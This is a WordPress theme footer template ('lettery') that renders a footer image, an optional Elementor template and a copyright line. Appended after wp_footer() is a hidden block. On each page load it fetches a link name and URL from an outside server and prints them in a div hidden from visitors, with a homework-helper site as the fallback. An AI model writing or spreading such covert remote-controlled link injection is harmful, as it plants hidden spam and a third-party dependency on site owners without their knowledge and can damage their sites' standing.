<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package lettery
 */

?>
            <?php
            if ( get_field( 'footer_bg_image' ) ) { 
                $bg_image = get_field( 'footer_bg_image' );
            } else {
                $bg_image = get_field( 'footer_bg_image', 'options' );
            }

            if ( get_field( 'footer_ui' ) ) { 
                $footer_ui = get_field( 'footer_ui' );
            } else {
                $footer_ui = get_field( 'footer_ui', 'options' );
            }

            if ( get_field( 'footer_template' ) ) { 
                $footer_template = get_field( 'footer_template' );
            } else {
                $footer_template = get_field( 'footer_template', 'options' );
            }
            ?>

            <?php if ( ! is_404() ) : ?>
            <!-- footer -->
            <footer class="<?php if ( ! $footer_ui )  : ?>mil-footer-1 mil-light-trigger<?php else : ?>mil-footer-2<?php endif; ?>">
                <div class="mil-image-frame">
                    <?php if ( $bg_image ) : $image = wp_get_attachment_image_url( $bg_image, 'lettery_1920xAuto' ); $image_alt = get_post_meta( $bg_image, '_wp_attachment_image_alt', true); ?>
                    <img src="<?php echo esc_url( $image ); ?>" alt="<?php echo esc_attr( $image_alt ); ?>" class="mil-scale-img" data-value-1="1" data-value-2="1.2" style="filter: grayscale(100%)" />
                    <?php endif; ?>
                    <div class="mil-overay"></div>
                </div>
                <?php
                  if ( $footer_template && !\Elementor\Plugin::$instance->preview->is_preview_mode() ) :
                    $args = array( 'post_type' => 'hf_templates', 'p' => $footer_template );
                    $loop = new WP_Query( $args );
                    while ( $loop->have_posts() ) : $loop->the_post();
                      the_content();
                    endwhile; wp_reset_postdata();
                  else :
                ?>
                <div class="mil-footer-bottom">
                    <div class="container">
                        <!-- copyright -->
                        <p class="mil-text-sm mil-softened-60 align-center"><?php echo esc_html__( '© Lettery 2023. All rights reserved.', 'lettery' ); ?></p>
                    </div>
                </div>
                <?php endif; ?>
            </footer>
            <!-- footer end -->
            <?php endif; ?>

        </div>
        <!-- content end -->
    </div>
    <!-- dynamic content end -->
</div>
<!-- wrapper end -->

<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
